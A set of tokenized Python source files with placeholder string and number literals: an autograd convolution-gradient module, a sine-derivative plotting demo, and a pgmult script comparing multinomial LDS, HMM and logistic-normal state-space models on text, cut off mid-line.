def parse_axes(A_shape, B_shape, conv_axes, dot_axes, mode):
    """Classify every axis of A and B as convolved, contracted ('dot'),
    or ignored, and derive the output's axis layout and shapes.

    Output axis order is: A-ignored, B-ignored, convolution axes.
    Returns (axes, shapes) dicts keyed by '<STR_LIT:A>'/'<STR_LIT:B>'/output.
    """
    A_ndim, B_ndim = len(A_shape), len(B_shape)
    if conv_axes is None:
        conv_axes = [list(range(A_ndim)), list(range(A_ndim))]
    axes = {'<STR_LIT:A>': {'<STR_LIT>': list(conv_axes[<NUM_LIT:0>]),
                  '<STR_LIT>': list(dot_axes[<NUM_LIT:0>]),
                  '<STR_LIT:ignore>': [i for i in range(A_ndim)
                             if i not in conv_axes[<NUM_LIT:0>] and i not in dot_axes[<NUM_LIT:0>]]},
            '<STR_LIT:B>': {'<STR_LIT>': list(conv_axes[<NUM_LIT:1>]),
                  '<STR_LIT>': list(dot_axes[<NUM_LIT:1>]),
                  '<STR_LIT:ignore>': [i for i in range(B_ndim)
                             if i not in conv_axes[<NUM_LIT:1>] and i not in dot_axes[<NUM_LIT:1>]]}}
    # Convolved and contracted axis lists must pair up one-to-one.
    assert len(axes['<STR_LIT:A>']['<STR_LIT>']) == len(axes['<STR_LIT:B>']['<STR_LIT>'])
    assert len(axes['<STR_LIT:A>']['<STR_LIT>']) == len(axes['<STR_LIT:B>']['<STR_LIT>'])
    i1 = len(axes['<STR_LIT:A>']['<STR_LIT:ignore>'])
    i2 = i1 + len(axes['<STR_LIT:B>']['<STR_LIT:ignore>'])
    i3 = i2 + len(axes['<STR_LIT:A>']['<STR_LIT>'])
    axes['<STR_LIT>'] = {'<STR_LIT>': list(range(i1)),
                '<STR_LIT>': list(range(i1, i2)),
                '<STR_LIT>': list(range(i2, i3))}
    conv_shape = [compute_conv_size(A_shape[i], B_shape[j], mode)
                  for i, j in zip(axes['<STR_LIT:A>']['<STR_LIT>'], axes['<STR_LIT:B>']['<STR_LIT>'])]
    shapes = {'<STR_LIT:A>': {s: [A_shape[i] for i in ax] for s, ax in iteritems(axes['<STR_LIT:A>'])},
              '<STR_LIT:B>': {s: [B_shape[i] for i in ax] for s, ax in iteritems(axes['<STR_LIT:B>'])}}
    shapes['<STR_LIT>'] = {'<STR_LIT>': shapes['<STR_LIT:A>']['<STR_LIT:ignore>'],
                  '<STR_LIT>': shapes['<STR_LIT:B>']['<STR_LIT:ignore>'],
                  '<STR_LIT>': conv_shape}
    return axes, shapes


def compute_conv_size(A_size, B_size, mode):
    # Standard output lengths for full / same / valid 1-d convolution.
    if mode == '<STR_LIT>':
        return A_size + B_size - <NUM_LIT:1>
    elif mode == '<STR_LIT>':
        return A_size
    elif mode == '<STR_LIT>':
        return abs(A_size - B_size) + <NUM_LIT:1>
    else:
        raise Exception("<STR_LIT>".format(mode))


def flipped_idxs(ndim, axes):
    # Index tuple that reverses the given axes and leaves the rest alone.
    new_idxs = [slice(None)] * ndim
    for ax in axes:
        new_idxs[ax] = slice(None, None, -<NUM_LIT:1>)
    return new_idxs


def make_grad_convolve(argnum, ans, A, B, axes=None, dot_axes=[(), ()], mode='<STR_LIT>'):
    """Gradient factory for convolve w.r.t. argument `argnum`.

    The gradient of a convolution is itself a convolution: the incoming
    gradient `g` convolved with the *other* operand flipped along the
    convolution axes, with the mode switched as needed, then transposed
    back into the differentiated operand's axis order.
    """
    assert mode in ['<STR_LIT>', '<STR_LIT>'], "<STR_LIT>".format(mode)
    axes, shapes = parse_axes(A.shape, B.shape, axes, dot_axes, mode)
    if argnum == <NUM_LIT:0>:
        X, Y = A, B
        _X_, _Y_ = '<STR_LIT:A>', '<STR_LIT:B>'
        ignore_Y = '<STR_LIT>'
    elif argnum == <NUM_LIT:1>:
        X, Y = B, A
        _X_, _Y_ = '<STR_LIT:B>', '<STR_LIT:A>'
        ignore_Y = '<STR_LIT>'
    else:
        raise NotImplementedError("<STR_LIT>".format(argnum))
    if mode == '<STR_LIT>':
        new_mode = '<STR_LIT>'
    else:
        # Pick the mode that inverts the forward size change for X.
        if any([x_size > y_size for x_size, y_size in zip(shapes[_X_]['<STR_LIT>'], shapes[_Y_]['<STR_LIT>'])]):
            new_mode = '<STR_LIT>'
        else:
            new_mode = '<STR_LIT>'

    def grad_fun(g):
        result = convolve(g, Y[flipped_idxs(Y.ndim, axes[_Y_]['<STR_LIT>'])],
                          axes=[axes['<STR_LIT>']['<STR_LIT>'], axes[_Y_]['<STR_LIT>']],
                          dot_axes=[axes['<STR_LIT>'][ignore_Y], axes[_Y_]['<STR_LIT:ignore>']],
                          mode=new_mode)
        # Undo the ignored/dot/conv block ordering back to X's layout.
        new_order = npo.argsort(axes[_X_]['<STR_LIT:ignore>'] + axes[_X_]['<STR_LIT>'] + axes[_X_]['<STR_LIT>'])
        return np.transpose(result, new_order)
    return grad_fun


convolve.defgrads(make_grad_convolve, [<NUM_LIT:0>, <NUM_LIT:1>])
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> import autograd . numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from autograd import grad <EOL> from builtins import range , map <EOL> def fun ( x ) : <EOL> return np . sin ( x ) <EOL> d_fun = grad ( fun ) <EOL> dd_fun = grad ( d_fun ) <EOL> x = np . linspace ( - <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> plt . plot ( x , list ( map ( fun , x ) ) , x , list ( map ( d_fun , x ) ) , x , list ( map ( dd_fun , x ) ) ) <EOL> plt . xlim ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) <EOL> plt . ylim ( [ - <NUM_LIT> , <NUM_LIT> ] ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . clf ( ) <EOL> def fun ( x ) : <EOL> currterm = x <EOL> ans = currterm <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> print ( i , end = '<STR_LIT:U+0020>' ) <EOL> currterm = - currterm * x ** <NUM_LIT:2> / ( ( <NUM_LIT:2> * i + <NUM_LIT:3> ) * ( <NUM_LIT:2> * i + <NUM_LIT:2> ) ) <EOL> ans = ans + currterm <EOL> if np . abs ( currterm ) < <NUM_LIT> : break <EOL> return ans <EOL> d_fun = grad ( fun ) <EOL> dd_fun = grad ( d_fun ) <EOL> x = np . linspace ( - <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> plt . plot ( x , list ( map ( fun , x ) ) , x , list ( map ( d_fun , x ) ) , x , list ( map ( dd_fun , x ) ) ) <EOL> plt . xlim ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) <EOL> plt . ylim ( [ - <NUM_LIT> , <NUM_LIT> ] ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . clf ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os <EOL> import gzip <EOL> import time <EOL> import cPickle <EOL> import collections <EOL> import numpy as np <EOL> from scipy . misc import logsumexp <EOL> from sklearn . feature_extraction . text import CountVectorizer <EOL> import matplotlib . pyplot as plt <EOL> from hips . plotting . layout import create_figure <EOL> import brewer2mpl <EOL> from pgmult . lds import MultinomialLDS <EOL> from pgmult . particle_lds import LogisticNormalMultinomialLDS , ParticleSBMultinomialLDS <EOL> from pgmult . hmm import MultinomialHMM <EOL> from pgmult . utils import pi_to_psi <EOL> from pylds . models import NonstationaryLDS <EOL> from pybasicbayes . distributions import GaussianFixed , Multinomial , Regression <EOL> from pybasicbayes . util . text import progprint_xrange <EOL> from autoregressive . distributions import AutoRegression <EOL> colors = brewer2mpl . get_map ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:9> ) . mpl_colors <EOL> goodcolors = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , ] ) <EOL> colors = np . array ( colors ) [ goodcolors ] <EOL> np . seterr ( invalid = "<STR_LIT>" ) <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> np . seterr ( invalid = "<STR_LIT>" ) <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> K = <NUM_LIT:1000> <EOL> def load ( filename = os . path . join ( "<STR_LIT:data>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as infile : <EOL> bigstr = infile . read ( ) <EOL> docs = [ bigstr . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) . translate ( None , "<STR_LIT>" ) ] <EOL> vectorizer = CountVectorizer ( stop_words = '<STR_LIT>' , max_features = K ) . fit ( docs ) <EOL> docs = [ make_onehot_seq ( doc , vectorizer ) for doc in docs ] <EOL> words = vectorizer . vocabulary_ . keys ( ) <EOL> usage = np . array ( [ doc . sum ( <NUM_LIT:0> ) for doc in docs ] ) . 
sum ( <NUM_LIT:0> ) <EOL> perm = np . argsort ( usage ) [ : : - <NUM_LIT:1> ] <EOL> docs = [ doc [ : , perm ] for doc in docs ] <EOL> words = np . array ( words ) [ perm ] <EOL> return docs , words <EOL> def filter_wordseq ( doc , vectorizer ) : <EOL> return [ w for w in doc if w in vectorizer . vocabulary_ ] <EOL> def make_onehot_seq ( doc , vectorizer ) : <EOL> lst = filter_wordseq ( vectorizer . build_analyzer ( ) ( doc ) , vectorizer ) <EOL> indices = { word : idx for idx , word in enumerate ( vectorizer . vocabulary_ . keys ( ) ) } <EOL> out = np . zeros ( ( len ( lst ) , len ( indices ) ) ) <EOL> for wordidx , word in enumerate ( lst ) : <EOL> out [ wordidx , indices [ word ] ] = <NUM_LIT:1> <EOL> return out <EOL> Results = collections . namedtuple ( "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def fit_lds_model ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> mus = [ X . sum ( <NUM_LIT:0> ) + <NUM_LIT:0.1> for X in Xs ] <EOL> mus = [ mu / mu . sum ( ) for mu in mus ] <EOL> models = [ MultinomialLDS ( K , D , <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = <NUM_LIT:1> * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> sigma_C = <NUM_LIT:1.> , mu_pi = mus [ i ] ) for i in xrange ( Nx ) ] <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> [ model . resample_parameters ( ) for model in models ] <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xt , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xt , M = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , models , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . 
time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_hmm ( Xs , Xtest , D_hmm , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D_hmm ) <EOL> models = [ MultinomialHMM ( K , D_hmm , alpha_0 = <NUM_LIT> ) for _ in xrange ( Nx ) ] <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xtr , Xte , model in zip ( Xs , Xtest , models ) : <EOL> pred_ll += model . log_likelihood ( np . vstack ( ( Xtr , Xte ) ) ) - model . log_likelihood ( ) <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_gaussian_lds_model ( Xs , Xtest , D_gauss_lds , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D_gauss_lds ) <EOL> models = [ NonstationaryLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . 
eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = <NUM_LIT:1> * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) ) <EOL> for _ in xrange ( Nx ) ] <EOL> Xs_centered = [ X - np . mean ( X , axis = <NUM_LIT:0> ) [ None , : ] + <NUM_LIT> * np . random . randn ( * X . shape ) for X in Xs ] <EOL> for X , model in zip ( Xs_centered , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xtr , Xte , model in zip ( Xs_centered , Xtest , models ) : <EOL> Npred = <NUM_LIT:10> <EOL> Tpred = Xte . shape [ <NUM_LIT:0> ] <EOL> preds = model . sample_predictions ( Xtr , Tpred , Npred = Npred ) <EOL> inds = np . argmax ( preds , axis = <NUM_LIT:1> ) <EOL> pi = np . array ( [ np . bincount ( inds [ t ] , minlength = K ) for t in xrange ( Tpred ) ] ) / float ( Npred ) <EOL> assert np . allclose ( pi . sum ( axis = <NUM_LIT:1> ) , <NUM_LIT:1.0> ) <EOL> pi = np . clip ( pi , <NUM_LIT> , <NUM_LIT:1.0> ) <EOL> pi /= pi . sum ( axis = <NUM_LIT:1> ) [ : , None ] <EOL> pred_ll += np . sum ( [ Multinomial ( weights = pi [ t ] , K = K ) . log_likelihood ( Xte [ t ] [ None , : ] ) <EOL> for t in xrange ( Tpred ) ] ) <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . 
cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_ln_lds_model ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D ) <EOL> mus = [ X . sum ( <NUM_LIT:0> ) + <NUM_LIT:0.1> for X in Xs ] <EOL> mus = [ np . log ( mu / mu . sum ( ) ) for mu in mus ] <EOL> models = [ LogisticNormalMultinomialLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = D * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = D * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) , <EOL> sigma_C = <NUM_LIT:1.0> , mu = mu ) for mu in mus ] <EOL> for model in models : <EOL> model . A = <NUM_LIT:0.5> * np . eye ( D ) <EOL> model . sigma_states = np . eye ( D ) <EOL> model . C = <NUM_LIT:1.0> * np . random . randn ( K , D ) <EOL> model . sigma_obs = <NUM_LIT:0.1> * np . eye ( K ) <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xte , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xte , Npred = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . 
cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_lds_model_with_pmcmc ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D ) <EOL> models = [ ParticleSBMultinomialLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = D * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = D * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) , <EOL> mu = pi_to_psi ( np . ones ( K ) / K ) , <EOL> sigma_C = <NUM_LIT:1.0> ) <EOL> for _ in xrange ( Nx ) ] <EOL> for model in models : <EOL> model . A = <NUM_LIT:0.5> * np . eye ( D ) <EOL> model . sigma_states = np . eye ( D ) <EOL> model . C = np . random . randn ( K - <NUM_LIT:1> , D ) <EOL> model . sigma_obs = <NUM_LIT:0.1> * np . eye ( K ) <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xte , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xte , Npred = <NUM_LIT:100> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . 
cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def plot_log_likelihood ( results , names , results_dir , outname = "<STR_LIT>" ) : <EOL> plt . figure ( figsize = ( <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> for i , ( result , name ) in enumerate ( zip ( results , names ) ) : <EOL> plt . plot ( result . timestamps , result . lls , lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , outname ) ) <EOL> plt . tight_layout ( ) <EOL> def plot_pred_log_likelihood ( results , names , results_dir , <EOL> outname = "<STR_LIT>" , <EOL> smooth = True , burnin = <NUM_LIT:0> ) : <EOL> baseline = <NUM_LIT:0> <EOL> normalizer = <NUM_LIT:0> <EOL> for Xtr , Xte in zip ( Xtrain , Xtest ) : <EOL> pi_emp = Xtr . sum ( <NUM_LIT:0> ) / float ( Xtr . sum ( ) ) <EOL> pi_emp = np . clip ( pi_emp , <NUM_LIT> , np . inf ) <EOL> pi_emp /= pi_emp . sum ( ) <EOL> baseline += Multinomial ( weights = pi_emp , K = Xtr . shape [ <NUM_LIT:1> ] ) . log_likelihood ( Xte ) . sum ( ) <EOL> normalizer += Xte . sum ( ) <EOL> fig = create_figure ( figsize = ( <NUM_LIT> , <NUM_LIT> ) , transparent = True ) <EOL> fig . set_tight_layout ( True ) <EOL> for i , ( result , name ) in enumerate ( zip ( results , names ) ) : <EOL> if result . pred_lls . ndim == <NUM_LIT:2> : <EOL> pred_ll = result . pred_lls [ : , <NUM_LIT:0> ] <EOL> else : <EOL> pred_ll = result . pred_lls <EOL> if smooth : <EOL> win = <NUM_LIT:10> <EOL> pad_pred_ll = np . concatenate ( ( pred_ll [ <NUM_LIT:0> ] * np . ones ( win ) , pred_ll ) ) <EOL> smooth_pred_ll = np . array ( [ logsumexp ( pad_pred_ll [ j - win : j + <NUM_LIT:1> ] ) - np . log ( win ) <EOL> for j in xrange ( win , pad_pred_ll . size ) ] ) <EOL> plt . plot ( np . clip ( result . timestamps [ burnin : ] , <NUM_LIT> , np . 
inf ) , <EOL> ( smooth_pred_ll [ burnin : ] - baseline ) / normalizer , <EOL> lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> else : <EOL> plt . plot ( np . clip ( result . timestamps [ burnin : ] , <NUM_LIT> , np . inf ) , <EOL> result . pred_lls [ burnin : ] , <EOL> lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> xmin = <NUM_LIT:10> ** <NUM_LIT:0> <EOL> xmax = <NUM_LIT:10> ** <NUM_LIT> <EOL> plt . plot ( [ xmin , xmax ] , np . zeros ( <NUM_LIT:2> ) , '<STR_LIT>' , lw = <NUM_LIT:0.5> ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . xlim ( xmin , xmax ) <EOL> plt . xscale ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . ylim ( - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , outname ) ) <EOL> def plot_pred_ll_vs_D ( all_results , Ds , Xtrain , Xtest , <EOL> results_dir , models = None ) : <EOL> N = len ( Ds ) <EOL> M = len ( all_results [ <NUM_LIT:0> ] ) <EOL> T = len ( all_results [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . pred_lls ) <EOL> pred_lls = np . zeros ( ( N , M , T ) ) <EOL> for n in xrange ( N ) : <EOL> for m in xrange ( M ) : <EOL> if all_results [ n ] [ m ] . pred_lls . ndim == <NUM_LIT:2> : <EOL> pred_lls [ n , m ] = all_results [ n ] [ m ] . pred_lls [ : , <NUM_LIT:0> ] <EOL> else : <EOL> pred_lls [ n , m ] = all_results [ n ] [ m ] . pred_lls <EOL> burnin = T // <NUM_LIT:2> <EOL> pred_ll_mean = logsumexp ( pred_lls [ : , : , burnin : ] , axis = - <NUM_LIT:1> ) - np . log ( T - burnin ) <EOL> pred_ll_std = np . zeros_like ( pred_ll_mean ) <EOL> for n in xrange ( N ) : <EOL> for m in xrange ( M ) : <EOL> samples = np . random . choice ( pred_lls [ n , m , burnin : ] , size = ( <NUM_LIT:100> , ( T - burnin ) ) , replace = True ) <EOL> pll_samples = logsumexp ( samples , axis = <NUM_LIT:1> ) - np . log ( T - burnin ) <EOL> pred_ll_std [ n , m ] = pll_samples . 
std ( ) <EOL> baseline = <NUM_LIT:0> <EOL> normalizer = <NUM_LIT:0> <EOL> for Xtr , Xte in zip ( Xtrain , Xtest ) : <EOL> pi_emp = Xtr . sum ( <NUM_LIT:0> ) / float ( Xtr . sum ( ) ) <EOL> pi_emp = np . clip ( pi_emp , <NUM_LIT> , np . inf ) <EOL> pi_emp /= pi_emp . sum ( ) <EOL> baseline += Multinomial ( weights = pi_emp , K = Xtr . shape [ <NUM_LIT:1> ] ) . log_likelihood ( Xte ) . sum ( ) <EOL> normalizer += Xte . sum ( ) <EOL> from hips . plotting . layout import create_figure <EOL> fig = create_figure ( figsize = ( <NUM_LIT> , <NUM_LIT> ) , transparent = True ) <EOL> fig . set_tight_layout ( True ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . spines [ '<STR_LIT>' ] . set_visible ( False ) <EOL> ax . spines [ '<STR_LIT:right>' ] . set_visible ( False ) <EOL> ax . get_xaxis ( ) . tick_bottom ( ) <EOL> ax . get_yaxis ( ) . tick_left ( ) <EOL> width = np . min ( np . diff ( Ds ) ) / ( M + <NUM_LIT:1.0> ) if len ( Ds ) > <NUM_LIT:1> else <NUM_LIT:1.> <EOL> for m in xrange ( M ) : <EOL> ax . bar ( Ds + m * width , <EOL> ( pred_ll_mean [ : , m ] - baseline ) / normalizer , <EOL> yerr = pred_ll_std [ : , m ] / normalizer , <EOL> width = <NUM_LIT> * width , color = colors [ m ] , ecolor = '<STR_LIT:k>' ) <EOL> ax . plot ( [ Ds . min ( ) - width , Ds . max ( ) + ( M + <NUM_LIT:1> ) * width ] , np . zeros ( <NUM_LIT:2> ) , '<STR_LIT>' ) <EOL> ax . set_xlim ( Ds . min ( ) - width , Ds . max ( ) + ( M + <NUM_LIT:1> ) * width ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , "<STR_LIT>" ) ) <EOL> def compute_singular_vectors ( model , words ) : <EOL> A , C , mu = model . A , model . C , model . emission_distn . mu <EOL> U , S , V = np . linalg . svd ( A ) <EOL> def top_k ( k , pi ) : <EOL> perm = np . argsort ( pi ) [ : : - <NUM_LIT:1> ] <EOL> return words [ perm ] [ : k ] <EOL> for d in xrange ( min ( <NUM_LIT:5> , A . 
shape [ <NUM_LIT:0> ] ) ) : <EOL> ud = U [ : , d ] <EOL> vd = V [ d , : ] <EOL> psi_ud = C . dot ( ud ) + mu <EOL> psi_vd = C . dot ( vd ) + mu <EOL> from pgmult . internals . utils import psi_to_pi <EOL> baseline = psi_to_pi ( mu ) <EOL> pi_ud = psi_to_pi ( psi_ud ) - baseline <EOL> pi_vd = psi_to_pi ( psi_vd ) - baseline <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , d , "<STR_LIT>" , S [ d ] ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( top_k ( <NUM_LIT:5> , pi_vd ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( top_k ( <NUM_LIT:5> , pi_ud ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run = <NUM_LIT:1> <EOL> results_dir = os . path . join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" % run ) <EOL> from pgmult . internals . utils import mkdir <EOL> if not os . path . exists ( results_dir ) : <EOL> print ( "<STR_LIT>" , results_dir ) <EOL> mkdir ( results_dir ) <EOL> Xs , words = load ( ) <EOL> docs = slice ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> T_end = <NUM_LIT> <EOL> T_split = <NUM_LIT:100> <EOL> Xfilt = filter ( lambda X : X . shape [ <NUM_LIT:0> ] > T_end , Xs ) <EOL> Xtrain = [ X [ : T_end - T_split ] for X in Xfilt [ docs ] ] <EOL> Xtest = [ X [ T_end - T_split : T_end ] for X in Xfilt [ docs ] ] <EOL> N_samples = <NUM_LIT> <EOL> all_results = [ ] <EOL> Ds = np . array ( [ <NUM_LIT:10> ] ) <EOL> models = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> methods = [ fit_lds_model , fit_hmm , fit_ln_lds_model ] <EOL> for D in Ds : <EOL> D_results = [ ] <EOL> for model , method in zip ( models , methods ) : <EOL> results_file = os . path . join ( results_dir , "<STR_LIT>" % ( model , D ) ) <EOL> if os . path . exists ( results_file ) : <EOL> print ( "<STR_LIT>" , results_file ) <EOL> with gzip . open ( results_file , "<STR_LIT:r>" ) as f : <EOL> D_model_results = cPickle . load ( f ) <EOL> else : <EOL> print ( "<STR_LIT>" , model , "<STR_LIT>" , D ) <EOL> D_model_results = method ( Xtrain , Xtest , D , N_samples ) <EOL> with gzip . 
